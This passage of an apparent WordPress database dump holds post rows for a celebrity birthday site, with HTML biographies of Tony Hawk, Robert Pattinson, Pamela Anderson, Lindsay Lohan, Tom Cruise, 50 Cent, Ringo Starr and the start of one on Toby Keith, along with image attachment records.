Anthony Frank Hawk on May 12, 1968, in San Diego, California to Frank and Nancy Hawk. He had three siblings—Lenore, Patricia and Steve. As a child, Hawk was considered intelligent, with an IQ of 144, yet high-strung and hyperactive. In short, Hawk was challenging for adults to manage.\r\n\r\nAt the age of 9, his older brother, Steve, gave him his first skateboard, a used blue fiberglass board. Hawk’s father built a skating ramp in the backyard where Hawk started practicing for up to six hours a day. When he outgrew the ramp, he began practicing at skateparks near his home. A short three years later, at the age of 12, he had landed his first sponsor, <a href=\"http://dogtownxsuicidal.com/\" target=\"_blank\">Dogtown skateboards</a> and was winning amateur contests throughout California. At 14, he became a professional skateboarder and by the time he was 16 years old he was considered one of the best skateboarders in the entire world.\r\n<h2>Career Accomplishments</h2>\r\nTony Hawk’s professional skateboarding career lasted for 17 years, during which he won 73 <a href=\"http://skateboard.about.com/od/skateboardcalendar/tp/Skateboard_Events_Calendar.htm\" target=\"_blank\">skateboarding contests</a> and placed second in 19. That record will almost certainly never be matched. Hawk competed in the first Extreme Games, later called the X Games, in 1995 and won a gold medal—a feat he repeated in the 1997 X Games. It was his success at the X Games, and the media attention that followed, that made him a household name.\r\n<h2>Most Known For</h2>\r\nHawk’s ability to perform impressive stunts fueled his fame. He created the amazing \"900\" trick, in which the skateboarder rotates 900 degrees (about two and a half turns) while in mid-air. He performed the trick successfully at the 1999 X Games before retiring from competition.\r\n\r\nHe also started a skateboarding company, <a href=\"http://birdhouseskateboards.com/\" target=\"_blank\">Birdhouse Projects</a>, in the 1990s when the skateboarding craze was waning. The company struggled until the rise of extreme sports resurrected skateboarding.\r\n<h2>Current Personal Life</h2>\r\nHawk is currently married to Lhotse Merriam whom he wed in January 2006. The couple had a daughter, Kadence, in 2008. He has three boys from previous marriages. His oldest son, Riley, is from his first marriage to Cindy Dunbar, which lasted from 1990 to 1994. Spencer and Keegan are his sons from his second marriage to Erin Lee, which lasted from 2001 to 2004.\r\n<h2>Where Are They Now</h2>\r\nHawk still rides, gives skateboarding demonstrations, and devises new tricks. He also still runs Birdhouse and has a line of video games and skateboarding videos that he teamed up with Activision to create in 1999. He also still runs an extreme sports tour called Tony Hawk\'s Boom Boom HuckJam Tour, which he started in 2002. The tour boasts some of the best skateboarders, BMXers and freetyle motocross riders and plays in large arenas and them parks across the United States. Hawk also hosts a weekly radio program on the Sirius XM satellite radio station.\r\n\r\nIn addition, Hawk runs the <a href=\"http://tonyhawkfoundation.org/donate/\" target=\"_blank\">Tony Hawk Foundation</a>, a non-profit group that provides grants and technical assistance for new skateboarding parks, especially in low-income areas.\r\n\r\n[<a href=\"https://www.flickr.com/photos/jbonvouloir/3590676654/sizes/l\" target=\"_blank\">Image</a>]\r\n\r\n ','Tony Hawk','','publish','open','open','','tony-hawk','','','2015-10-14 15:51:03','2015-10-14 15:51:03','',0,'http://birthdaypedia.wpengine.com/?p=120',0,'post','',0),(121,2,'2015-05-13 10:35:50','2015-05-13 10:35:50','<h2>In the Beginning</h2>\r\n<a href=\"http://hollywoodlife.com/celeb/robert-pattinson/\" target=\"_blank\">Robert Douglas Thomas Pattinson</a> was born on May 13, 1986 in Barnes, London England to Clare (Charlton) who worked at a modeling agency and Richard Pattinson, a vintage car importer. He is the youngest of three children and the only son. His two older sisters are Lizzy and Victoria.\r\n\r\nEven as a young boy, Pattinson wanted to be a performer and at first aspired to be a musician like his sister Lizzy. He began taking piano lessons at the age of 3 and classical guitar two years later at the age of 5. But his father encouraged him to try acting. So, at the early age of 15, Pattinson began acting in amateur plays with the Barnes Theater Company at the Harrodian private school in London where he attended. He immediately landed starring roles in plays such as Our Town, Anything Goes, and Tess of the d’Urbervilles.\r\n\r\nHis performances certainly did not go unnoticed. At the age of 17, in 2003, he made the move from the stage to the screen by landing a role in the TV movie, Ring of the Nibelungs, which was filmed in South Africa. Next, in 2004, he landed an uncredited role in the movie Vanity Fair. He also took on the screen role of Giselher in the Curse of the Ring in 2004.\r\n<h2>Career Accomplishments</h2>\r\nPattinson’s first big role was as Cedric Diggory in Harry Potter and the Goblet of Fire in 2005. But he became a household name when he was cast as the heartthrob Edward Cullen, a vampire in love, in the movie <a href=\"http://www.imdb.com/title/tt1099212?ref_=nmbio_mbio\" target=\"_blank\">Twilight</a>. In Twilight, Pattinson, an excellent musician who plays both guitar and piano and is a huge Van Morrison fan, also performs two songs. He also made three more Twilight films in The Twilight Saga: Eclipse and parts 1 and 2 of The Twilight Saga: Breaking Dawn.\r\n\r\nAdditionally, Pattinson has portrayed a young <a href=\"http://www.salvador-dali.org/en_index/\" target=\"_blank\">Salvador Dalí</a> in Little Ashes, a troubled young man in Remember Me, and the cold-hearted and calculating billionaire Eric Packer in Cosmpolis, which earned him critical praise. He also starred in <a href=\"https://en.wikipedia.org/wiki/Water_for_Elephants_(film)\" target=\"_blank\">Water for Elephants</a>, the futuristic western The Rover, the satiric drama Maps to the Stars, in Queen of the Desert and in Life, a drama film about Life Magazine photographer Dennis Stock (Pattinson) and James Dean.[22]\r\n<h2>Most Known For</h2>\r\nActor Robert Pattinson is known for such roles as Cedric Diggory in 2005\'s Harry Potter and the Goblet of Fire and Edward Cullen in Twilight. He is also widely recognized by his trademark looks, which include his messy hair style and thick eyebrows.\r\n<h2>Current Personal Life</h2>\r\nHe remains close friends with Harry Potter and the Goblet of Fire co-stars Stanislav Ianevski and Katie Leung. He is engaged to FKA Twigs, a British singer, songwriter, producer and dancer. The couple have been dating since September 2014.\r\n<h2>Where Is He Now</h2>\r\nPattinson continues to act and make music. He is currently working on James Gray\'s The Lost City of Z, about an explorer who disappeared in the Amazon while looking for an ancient city. Pattinson supports and promotes the ECPAT UK\'s campaign Stop Sex Trafficking of Children and Young People to stop human trafficking. He is also a member of <a href=\"https://internationalmedicalcorps.org/\" target=\"_blank\">International Medical Corps</a> and has done Public service announcements to raise awareness about cancer.\r\n\r\n[<a href=\"https://www.flickr.com/photos/i_heart_him/3374520674/sizes/o/\" target=\"_blank\">Image</a>]\r\n\r\n ','Robert Pattinson','','publish','open','open','','robert-pattinson','','','2015-10-14 15:51:22','2015-10-14 15:51:22','',0,'http://birthdaypedia.wpengine.com/?p=121',0,'post','',0),(122,2,'2015-07-07 17:43:35','2015-07-07 17:43:35','','La Toya Jackson','','inherit','open','open','','la-toya-jackson','','','2015-07-07 17:43:39','2015-07-07 17:43:39','',77,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/La-Toya-Jackson.jpg',0,'attachment','image/jpeg',0),(123,2,'2015-07-07 17:50:51','2015-07-07 17:50:51','','Lenny Kravitz','','inherit','open','open','','sony-dsc','','','2015-07-07 17:51:36','2015-07-07 17:51:36','',78,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Lenny-Kravitz.jpg',0,'attachment','image/jpeg',0),(124,2,'2015-07-07 17:56:56','2015-07-07 17:56:56','','Morgan Freeman','','inherit','open','open','','morgan-freeman','','','2015-07-07 17:57:03','2015-07-07 17:57:03','',79,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Morgan-Freeman.jpg',0,'attachment','image/jpeg',0),(125,2,'2015-07-07 18:04:51','2015-07-07 18:04:51','','Robert Englund','','inherit','open','open','','robert-englund-2','','','2015-07-07 18:05:42','2015-07-07 18:05:42','',80,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Robert-Englund.jpg',0,'attachment','image/jpeg',0),(126,2,'2015-07-07 18:08:00','2015-07-07 18:08:00','','Zachary Quinto','','inherit','open','open','','%ef%bb%bf%ef%bb%bfzachary-quinto','','','2015-07-07 18:08:51','2015-07-07 18:08:51','',81,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Zachary-Quinto.jpg',0,'attachment','image/jpeg',0),(127,2,'2015-07-07 18:19:45','2015-07-07 18:19:45','','Anderson Cooper','','inherit','open','open','','anderson-cooper','','','2015-07-07 18:19:50','2015-07-07 18:19:50','',115,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Anderson-Cooper.jpg',0,'attachment','image/jpeg',0),(128,2,'2015-07-07 18:27:24','2015-07-07 18:27:24','','Angelina Jolie','','inherit','open','open','','angelina-jolie','','','2015-07-07 18:28:36','2015-07-07 18:28:36','',117,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Angelina-Jolie.jpg',0,'attachment','image/jpeg',0),(129,2,'2015-07-07 18:33:20','2015-07-07 18:33:20','','Sabrina Carpenter','','inherit','open','open','','sabrina-carpenter','','','2015-07-07 18:33:26','2015-07-07 18:33:26','',118,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Sabrina-Carpenter.jpg',0,'attachment','image/jpeg',0),(130,2,'2015-07-07 18:39:23','2015-07-07 18:39:23','','Tony Hawk','','inherit','open','open','','tony-hawk','','','2015-07-07 18:39:28','2015-07-07 18:39:28','',120,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Tony-Hawk.jpg',0,'attachment','image/jpeg',0),(131,2,'2015-07-07 18:42:19','2015-07-07 18:42:19','','Robert Pattinson','','inherit','open','open','','robert-pattinson','','','2015-07-07 18:42:39','2015-07-07 18:42:39','',121,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Robert-Pattinson.jpg',0,'attachment','image/jpeg',0),(134,2,'2015-07-01 08:20:41','2015-07-01 08:20:41','<h2>In the Beginning</h2>\r\nMany are familiar with <a href=\"http://www.pamelaandersonfoundation.org/\" target=\"_blank\">Pamela Anderson</a>, but not everyone is familiar with all of her achievements. She had the most humble of beginnings, her mother being a waitress and her father being an HVAC specialist. Interestingly enough, she managed to get a bit of publicity the day that she was born, as she was the country’s centennial baby, being born on July 1, 1967, the 100<sup>th</sup> anniversary of Canada’s founding. Aside from that brief high, her childhood was not pleasant. It is known now that she suffered constant sexual abuse at the hands of a female babysitter, and again by a 25 year old man. None of this abuse, however, was perpetrated by either of her parents.\r\n\r\nDuring her childhood she attended Highland Secondary School in <a href=\"http://www.hellobc.com/comox.aspx\" target=\"_blank\">Comox</a> where she played on a volleyball team and graduated in 1985. In 1988, she made a move to Vancouver where she would work as a fitness instructor.\r\n\r\nIn 1989, Pamela Anderson attended a BC Lions Canadian Football League game, and she was featured on the Jumbotron wearing a Labatt’s Beer t-shirt. The brewing company took notice and immediately hired her as a spokesmodel for the company. This was the beginning of what would become a lucrative career.\r\n<h2>Career Accomplishments</h2>\r\nAfter her brief stint as a spokesmodel, Pamela Anderson quickly began her rise to fame by starting on a television sitcom called Home Improvement as the ‘Tool Time Girl’, and though she left the show after just two seasons, she went on to play C.J. Parker on Baywatch, a role which would last between 1992 and 1998. In addition to modeling for the magazine <em>Outdoor Life, </em>Anderson appeared in a music video called “Can’t Have your Cake” by Vince Neil.\r\n\r\n1996 would see Anderson playing in a movie called Barb Wire, which would never be a commercial success, but in 1998, she starred in a four year long series called VIP created by JF Lawton. She starred in several other music videos, and because of her role as CJ Parker, she gained plenty of international attention. In fact, she made a return to Baywatch for the 3004 reunion movie, and before that would appear on the popular sitcom <em><a href=\"http://www.thenanny.com/\" target=\"_blank\">The Nanny</a>. </em>\r\n\r\nAnderson became a naturalized citizen of the United States on May 12, 2004, though she did retain her Canadian citizenship. Having live in California since 1989, this came as no surprise to anyone.\r\n\r\nIn 2004 Anderson became an author, releasing the book <em>Star </em>which chronicles both the adventures and the struggles of a teenager attempting to become famous. She released a second book, Star Struck in 2005 which was a representation of her own life, but not necessarily an autobiography.\r\n\r\nShe would go on to star in many more movies and television shows, and in 2006, she was given a star on Canada’s Walk of Fame. She is in fact only the second model to receive a star. Anderson made several appearances in the WWF(World Wrestling Federation) and also made appearances on various iterations of the popular reality television show ‘Big Brother’.\r\n<h2>Most Known For</h2>\r\nPamela Anderson is most known for her role on Baywatch, but she also gained some notoriety as a member of PETA, campaigning against the use of fur. She launched a campaign against <a href=\"https://www.organicconsumers.org/old_articles/foodsafety/kfc021605.php\" target=\"_blank\">Kentucky Fried Chicken</a>, with an open letter stating: \"What KFC does to 750 million chickens each year is not civilized or acceptable.\"\r\n<h2>Current Personal Life</h2>\r\nAfter a number of tries, Pamela Anderson has finally managed to break free of her marriage to Rick Salomon and managed to wrangle a whopping $1 million in the settlement.\r\n<h2>Where Are They Now</h2>\r\nIn 2005, and presumably to this day, Anderson became the spokesperson for MAC cosmetics MAC AIDS Fund which helps individuals affected by AIDS and HIV. Anderson raised money in several different events and also became a celebrity spokesperson for the American Liver Foundation. She has also shown her support for the legalization of cannabis by writing an open letter to President Barrack Obama. Over the years she has proven herself to be a great actor as well as a great activist.\r\n\r\n<a href=\"https://www.flickr.com/photos/21072575@N00/4298506328/sizes/z/\" target=\"_blank\">Image credit</a>\r\n\r\n ','Pamela Anderson','','publish','open','open','','pamela-anderson','','','2015-10-14 18:20:46','2015-10-14 18:20:46','',0,'http://birthdaypedia.wpengine.com/?p=134',0,'post','',0),(135,2,'2015-07-02 08:34:21','2015-07-02 08:34:21','<h2>In the Beginning</h2>\r\nLindsay Morgan Lohan, born July 2, 1986 as Lindsay Dee Lohan is an <a href=\"https://birthdaypedia.com/la-toya-jackson/\">American actress</a>, singer, and a model, as many already know. Initially, Lohan attended Cold Spring Harbor High School and then Sanford H. Calhoun High school until the eleventh grade, at which point she began homeschooling. She began her career quite early at the age of three, posing s a child fashion model. Later on at the age of ten she was seen on the popular daytime soap opera ‘Another World’. While this was a spectacular role for a young actor, Lohan made her real debut when she was just eleven years old.\r\n<h2>Career Accomplishments</h2>\r\nHer first major film role was in the Disney remake of ‘The Parent Trap’ in 1998 which was a critical and commercial success. In this film, as everyone knows, the role calls for a set of twins, and there is only one Lindsay Lohan out there. That being the case, Lohan was forced to play both herself AND her British twin, making this one movie where she was really able tos how off her acting prowess to the world.\r\n\r\nFollowing ‘The Parent Trap’ she was next to start in a remake of ‘Freaky Friday’ which was also a commercial success. Her next film, however, ‘Mean Girls’ really put her on the map and made her a household name. The previous two films earned her a number of MTV Movie Awards as well as Teen Choice Awards, further solidifying her place in the film industry.\r\n\r\nIn 2004 <a href=\"http://es.disney.wikia.com/wiki/Lindsay_Lohan\" target=\"_blank\">Lohan</a> would move into the music industry, and her very first album ‘Speak’ would be certified platinum. Her next album would be titled ‘A Little more Personal(Raw)’ in 2005, and it was certified gold.\r\n\r\nThe year 2005 would see Lohan slide back into the film industry, starring in Disney’s ‘<a href=\"http://www.imdb.com/title/tt0400497/\" target=\"_blank\">Herbie: Fully Loaded</a>’ which was yet another box office success. She also performed in a number of independent films, but her acting career was seemingly put on hold in 2007 when she was arrested for drunk driving and put on probation, which led to the collapse of a number of different movie deals that she could have had.\r\n\r\nIn the years 2008 and 2009, she worked as a fashion model for the line 6126 and in that same time period returned to television, starring in the TV film ‘Labor Pains’. In addition to that she appeared in the 2010 film ‘Machete’ and she found herself in drug rehabilitation three more times. Her life became rather problematic however, as she spent more and more time dealing with legal issues due to her misdemeanors and various probation violations. In spite of that, she still managed to complete several more films, and she eventually made a stage debut in ‘Speed-the-Plow’.\r\n<h2>Most Known For</h2>\r\nLindsay Lohan is known for a number of different movies and films, but her most popular, arguably, was Mean Girls. Unfortunately, she is most known for her mounting <a href=\"http://www.buzzfeed.com/elliewoodward/celebrities-you-never-knew-had-criminal-records#.mmwNO7xmZ\" target=\"_blank\">criminal record</a>, and this came to a head when she missed a mandatory DUI progress hearing. She was sentenced to 90 days in jail, but much to the disgust of the public she only served 14 days of the sentence due to overcrowding.\r\n\r\nIn an incident here nearly the entire world was watching, Lohan’s probation was revoked after she failed a drug test, though she was released on bail. She was ordered to attend treatment at the Betty Ford Center, and she remained there for three months. After various other crimes, she was given various jail sentences but she never served much of the time, and in one instance only served about five hours.\r\n<h2>Current Personal Life</h2>\r\n2015 was a big year for Lohan as she would be completely free of probation for the first time in nearly eight years. A judge deemed her probation complete after she completed her community service, and she was once again free to pursue her life without legal entanglements.\r\n<h2>Where Are They Now</h2>\r\nLohan is still in the acting/<a href=\"https://birthdaypedia.com/ian-mckellen/\">film industry</a>, and she is presumed to still be making films, though many sources claim she is financially destitute. In addition to that, she is living in London, working on a book, and her Lavish Alice fashion line.\r\n\r\n[<a href=\"https://www.flickr.com/photos/congaman/4771788003/sizes/l\" target=\"_blank\">Image</a>]\r\n\r\n ','Lindsay Lohan','','publish','open','open','','lindsay-lohan','','','2015-10-14 18:21:19','2015-10-14 18:21:19','',0,'http://birthdaypedia.wpengine.com/?p=135',0,'post','',0),(136,2,'2015-07-17 02:46:54','2015-07-17 02:46:54','','Linsay Lohan','','inherit','open','open','','linsay-lohan','','','2015-07-17 02:47:14','2015-07-17 02:47:14','',135,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Linsay-Lohan.jpg',0,'attachment','image/jpeg',0),(138,2,'2015-07-03 07:47:42','2015-07-03 07:47:42','<h2>In the Beginning</h2>\r\nTom Cruise was born ‘Thomas Cruise Mapother IV’ on July 3, 1962. He was the son of Mary Lee and Thomas Cruise, and he was the brother to three sisters. To say that Cruise’s childhood was turbulent would be a gross understatement as his family was ruled by an abusive father, and Cruise was beaten constantly by the man who he would later define as a bully and a coward. The Cruise family spent a considerable amount of time in Canada, moving to the Ottawa suburb Beacon Hill in 1971.\r\n\r\nThe very first time Cruise delved into the acting world he was in the fourth grade and participated in an improvised play called ‘IT’ at the Carleton Elementary School drama festival. In addition to his love of theater, Cruise would also enjoy several sports including floor hockey, though he was notably aggressive on the field. Grade six saw a change of schools, and Cruise would go on to attend Henry Munroe Middle School. During this time, however, Cruise’s mother left their father and moved to the United States, meanwhile his father died of cancer.\r\n<h2>Career Accomplishments</h2>\r\nAside from the stage stint, <a href=\"http://www.tomcruise.com/\" target=\"_blank\">Tom Cruise</a>’s career really started at age 19 in the 1981 film titled ‘Endless Love’. In addition tot hat he would portray supporting roles in ‘Taps’, a military drama, and ‘The Outsiders’, a book adaptation. His next movie, and his first leading role ever in film was a romantic comedy called ‘Risky Business’ which would see release in August of 1983. Though this was a great movie, it couldn’t hold a candle to his role as Pete Mitchell in ‘Top Gun’, which is regarded as one of the greatest movies of all time.\r\n\r\nToday, Cruise is better known for his role as Ethan Hunt in the Mission Impossible franchise, and that franchise has spawned a total of four movies so far. The fifth Mission Impossible film is slated for release sometime in 2015.\r\n\r\nCruise has gone on to be regarded as one of the biggest movie stars in Hollywood, and has taken leading roles in a number of different films which include:\r\n<ul>\r\n <li>The Color of Money</li>\r\n <li>Cocktail</li>\r\n <li>Rain Man</li>\r\n <li>Born on the Fourth of July</li>\r\n <li>Far and Away</li>\r\n <li>A Few Good Men</li>\r\n <li>The Firm</li>\r\n <li>Interview with the Vampire</li>\r\n <li>Jerry Maguire</li>\r\n <li>Eyes Wide Shut</li>\r\n <li>Magnolia</li>\r\n</ul>\r\nThe 200’s saw Cruise in many successful films including the futuristic techno thriller, Minority Report, and the war film, The Last Samurai. In 2012, Cruise was Hollywood’s highest paid actor, with fifteen of his films grossing more than $100 million domestically, with over $200 million worldwide.\r\n\r\nCruise has won a number of awards including several <a href=\"http://www.goldenglobes.com/tom-cruise\" target=\"_blank\">Golden Globes</a> and the Saturn Award for Best Actor in Vanilla Sky. He also won an AFI Movie of the Year Award for The Last Samurai and an Empire Award for Best Actor for Minority Report.\r\n<h2>Most Known For</h2>\r\nCruise is most known for his appearances in Top Gun and the current Mission Impossible series, though this is not the only thing that he is known for. He is currently an advocate for the Church of Scientology and the various programs associated with it. He credits the church for helping him to overcome dyslexia, but he seems to hold great concerns over anything related to psychiatry and and-depressant drugs. He is incredibly outspoken and his views has sparked a considerable amount of controversy. Still, he has plenty of fans and plenty of followers.\r\n<h2>Current Personal Life</h2>\r\nThough he was married to <a href=\"https://en.wikipedia.org/wiki/Katie_Holmes\" target=\"_blank\">Katie Holmes</a>, the relationship fell apart in 2012, and both Cruise and his former partner acknowledged that the break had to do with his involvement in the church of Scientology.\r\n<h2>Where Are They Now</h2>\r\nRight now, Tom Cruise is confirmed to be working on the fifth installment of the <a href=\"http://www.missionimpossible.com/\" target=\"_blank\">Mission Impossible series</a>.\r\n\r\n<a href=\"https://www.flickr.com/photos/gageskidmore/9357416526/sizes/z/\" target=\"_blank\">Image credit</a>\r\n\r\n ','Tom Cruise','','publish','open','open','','tom-cruise','','','2015-10-14 18:21:45','2015-10-14 18:21:45','',0,'http://birthdaypedia.wpengine.com/?p=138',0,'post','',0),(139,2,'2015-07-06 08:04:29','2015-07-06 08:04:29','<h2>In the Beginning</h2>\r\nBefore he was known as 50 cent, he was <a href=\"http://www.biography.com/people/50-cent-21330489\" target=\"_blank\">Curtis James Jackson</a>, born and raised in the South Jamaica neighborhood of Queens, New York. He was born to his fifteen year old mother, Sbarina, who raised him until the age of eight, when she was murdered by an unknown assailant. Her drink was drugged, and she was killed via asphyxiation when her assailant activated the home’s gas and closed the windows. Following her death, Jackson went to live with his grandparents. He recalls being told the following: My grandmother told me, \'Your mother\'s not coming home. She\'s not gonna come back to pick you up. You\'re gonna stay with us now.\' That\'s when I started adjusting to the streets a little bit.\"\r\n\r\nAt the age of 11, Curtis began boxing, and when he was 14, a neighbor opened a boxing gym designed to cater to local youth.\r\n\r\nWhen I wasn\'t killing time in school, I was sparring in the gym or selling crack on the strip,\" Jackson recalls.\r\n\r\nIn the mid-1980’s be competed in the Junior Olympics, though at age 12, he fooled his grandparents into believing he was in after school programs while he was in fact dealing drugs on the streets. He was arrested for the first time at Andrew Jackson High School having brought both guns and drug money into the facility. At that point, he ceased to hide his unsavory lifestyle from his grandmother and began to openly sell drugs until he was arrested June 29, 1994 for selling four vials of cocaine to an undercover police officer. Three weeks later he was arrested again when the police searched his home and found both drugs and firearms. He was sentenced to three to nine years in prison, though he avoided the full sentence by completing six months at a boot camp and earning his GED. At this point, he adopted the nickname “50 Cent”, a metaphor for ‘Change’, meaning he was finally leaving his old life behind.\r\n<h2>Career Accomplishments</h2>\r\n50 cent, like most other artists, did not rise to fame alone. Instead, he had the help of established artists Eminem and Dr. Dre who would produce his first major-label album titled ‘Get Rich or Die Tryin’’. Rather quickly, Jackson(50 Cent) became one of the world’s <a href=\"https://birthdaypedia.com/tupac-shakur/\">best selling rappers</a> and headed up the group G-Unit. In 2003 he formed G-Unit Records, and experienced success with his second album, ‘The Massacre’, released in the year 2005. His fifth studio album was released in 2014, and he is currently working on a sixth, ‘Street King Immortal’, which will be released in 2015.\r\n\r\nThroughout his career, Jackson has managed to sell more than 30 million albums worldwide and has been the recipient of a <a href=\"http://www.aceshowbiz.com/celebrity/50_cent/awards.html\" target=\"_blank\">number of different awards</a>. These include:\r\n<ul>\r\n <li>1 Grammy Award</li>\r\n <li>Thirteen Billboard Music Awards</li>\r\n <li>Six World Music Awards</li>\r\n <li>Three American Music Awards</li>\r\n <li>Four BET Awards</li>\r\n</ul>\r\n50 Cent was named the sixth best artist of the 2000s, ranking right below Eminem and Nelly. 50 Cent has achieved quite a bit in his lucrative career and is hoping to do much more.\r\n<h2>Most Known For</h2>\r\n50 Cent is a great rapper, but he can also be held up as an example of an individual who crawled out of a life of crime and poverty and became the person that he wanted to be. It took a lot of hard work, but he did make it, and that serves as an inspiration to children and adults everywhere.\r\n<h2>Current Personal Life</h2>\r\nWhile 50 Cent is still producing music and working with his various companies as CEO, he did recently face a legal battle in which he was ordered to pay a woman $2.5 million for releasing her sex tape online. He was not present for the verdict and videotaped a deposition stating he didn’t think he needed her permission to use her likeness because ‘She was cool with it’.\r\n<h2>Where Are They Now</h2>\r\nRight now 50 cent is working on his <a href=\"http://www.billboard.com/articles/columns/the-juice/1538027/50-cents-evolution-how-his-past-is-hurting-his-future\" target=\"_blank\">latest studio album</a>, rumored to be released later this year.\r\n\r\n[<a href=\"https://www.flickr.com/photos/alexconst/2126724906/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','50 Cent','','publish','open','open','','50-cent','','','2015-10-14 18:22:11','2015-10-14 18:22:11','',0,'http://birthdaypedia.wpengine.com/?p=139',0,'post','',0),(141,2,'2015-07-07 07:20:20','2015-07-07 07:20:20','<h2>In the Beginning</h2>\r\nOn July 7, 1940, the world welcomed a new face, and one that would help to shape the world of music for many decades to come. Richard Starkley, born at 9 Madryn Street in <a href=\"http://www.liverpoolecho.co.uk/all-about/dingle\" target=\"_blank\">Dingle Liverpool</a> would o on to become the easily forgotten, but no less important member of the Beatles. Richard was born to Elsie and Richard Starkey, and the family was no stranger to music. Elsie, for example, sang and danced as a hobby, and the couple had spent much of their time in the ballroom circuit. The birth of Richard however put an end to those regular outings, much to their upset. The upset ended however, as Elsie took and overprotective approach to raising her son while the father, Big Ritchie, began spending long hours drinking and dancing in pubs.\r\n\r\nThe family moved in 1944 to a cheaper neighborhood, though Richard’s parents separated soon after and divorced in the same year. To this day, Richard claims he has no real memories of his father who did not attempt to bond with him. As a matter of fact, he visited him just three times after the separation. His mother, Elsie, was forced to take on a job as a local barmaid, an occupation which she would actually hold for a period of twelve years.\r\n\r\nStarkey developed appendicitis at the age of six, and the recovery process caused him to miss a considerable amount of his education. His mother allowed him to miss school quite a bit, and as a result, he found himself illiterate at the age of eight. This obvious lack of education attributed to him practically giving up, and remaining truant from school. He did, however, eventually catch up to his peers with the help of his neighbor Marie Maguire Crawford. Unfortunately, he contracted tuberculosis in 1953 and was sent to a sanatorium where he would remain for two years. During his stay however he would join the hospital band, and he then gained his first exposure to a percussion instrument. From then on, the child who would become Ringo Starr was obsessed with drums, and even went so far as to reject every other instrument that he was offered.\r\n<h2>Career Accomplishments</h2>\r\nIn 1955 Starkey would enter the workforce, briefly working for British Railways before becoming an apprentice for a Liverpool equipment manufacturer. Shortly after, be started a band, Eddie Clayton Skiffle Group which saw great success in England until it truly turned out to be fad music and was crushed by American Rock and Roll.\r\n\r\nThough he had obviously lost his niche, he became a member of another band, Rory Storm and the Hurricanes, which he promptly quit after becoming a moderate success. <a href=\"https://birthdaypedia.com/paul-mccartney/\">The Beatles</a> formed in 1960 and he quickly joined them, becoming Ringo Starr and playing key roles in all of their films. The Beatles gained international success and for a time were considered to be the most popular band in the world. All good things come to an end, however, and the Beatles broke up in 1970. This, however, was not the end of Ringo’s career as he would release a number of successful singles such as the number four US hit: ‘It Don’t Come Easy’. There were several other number one hits, and of course, his most successful single in the Untied Kingdom: ‘Back Off Boogaloo’.\r\n\r\nIn addition to being an accomplished singer, Ringo has been featured on several documentaries and has even hosted television shows. He served as the narrator for two different children’s programs, and since then has managed to influence many famous artists. In fact, he brought about a new era of drumming. Where drumming in a band was once considered background noise, or a way to keep the beat, Ringo found a way to make it his own, and made the art very distinctive.\r\n<h2>Most Known For</h2>\r\n<a href=\"http://www.ringostarr.com/\" target=\"_blank\">Ringo Starr</a> had been previously inducted into the Rock and Roll Hall of Fame as a member of the Beatles, but was later inducted for his solo career in 1988. Aside from being a member of the Beatles, he is now famous for being just one of 21 performers inducted into the hall of fame more than once.\r\n<h2>Current Personal Life</h2>\r\nRingo is currently celebrating his birthday with a viral hashtag, and plans to go back on tour in October.\r\n<h2>Where Are They Now</h2>\r\nCurrently, when not on tour, Ringo lives in the English village of <a href=\"http://www.placesforpeopleleisure.org/centres/cranleigh-leisure-centre/\" target=\"_blank\">Cranleigh</a>.\r\n\r\n[<a href=\"https://www.flickr.com/photos/schroederschoembs/5987573542/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Ringo Starr','','publish','open','open','','ringo-starr','','','2015-10-14 18:23:34','2015-10-14 18:23:34','',0,'http://birthdaypedia.wpengine.com/?p=141',0,'post','',0),(142,2,'2015-07-17 03:29:00','2015-07-17 03:29:00','','Ringo Starr','','inherit','open','open','','ringo-starr','','','2015-07-17 03:29:14','2015-07-17 03:29:14','',141,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/07/Ringo-Starr.jpg',0,'attachment','image/jpeg',0),(143,2,'2015-07-08 08:32:05','2015-07-08 08:32:05','<h2>In the Beginning</h2>\r\n<a href=\"http://www.billboard.com/articles/columns/country/6613283/toby-keith-country-rap-35-mph-town-drunk-americans\" target=\"_blank\">Toby Keith</a> was born to Carolyn Joan and Hubert K. Covel Jr. in Fort Smith, Arkansas where they would live for a few years during Keith’s grade school days, but eventually, they and their two other children would move to Moore, Oklahoma. Before that, however, Keith began doing odd jobs around his grandmother’s club in Fort Smith where he began to take an interest in the musicians that would pass through and play on the stage. He also took an interest in playing with the band and managed to get his very first guitar when he was just eight years old. Music, however, seemed to be put on hold when he moved with his family to Moore and he took up playing defensive end on the football team.\r\n\r\nHis graduation from high school saw him become an oil derrick hand in the fields, and he eventually became an operation manager. The age of twenty, was when he worked his way back into music with his friends, forming the ‘Easy Money Band’, which played at local bars while he continued to work in the oil fields. As most people know, the oil industry in Oklahoma declined in 1982, meaning that Toby Keith was out of a job, and was forced to play defensive end with a semi-pro team called the Oklahoma City Drillers. He found himself delving more and more into the music scene, though his friends and family were a bit doubtful that he would succeed as a <a href=\"https://birthdaypedia.com/george-strait/\">country music artist</a>. Fortunately, Toby Keith was smart enough to ignore those doubts and go his own way.\r\n<h2>Career Accomplishments</h2>\r\nKeith would release his first four studio albums between 1993 and 1996 in this order:\r\n<ul>\r\n <li>Toby Keith</li>\r\n <li>Boomtown</li>\r\n <li>Blue Moon</li>\r\n <li><a href=\"http://www.allmusic.com/album/dream-walkin-mw0000023548\" target=\"_blank\">Dream Walkin</a></li>\r\n</ul>\r\nIn addition to that he would release a greatest hits package before leaving his first record label: Mercury Records in 1998. All of these albums earned either gold or higher certification with several charged singles. His debut “Should’ve Been a Cowboy” topped the country charts and was the most played country song of the 1990’s.\r\n\r\nIn 1998 Keith signed a contract with DreamWorks Records and released the single “How Do You Like Me Now?!” which was the title of his 1999 album. Once again Toby Keith won the decade with his song being the mot played of the 2000’s, and his next three albums would yet again become number one hits.\r\n\r\nUpon the closing of DreamWorks in 2005, Keith found that he had just about 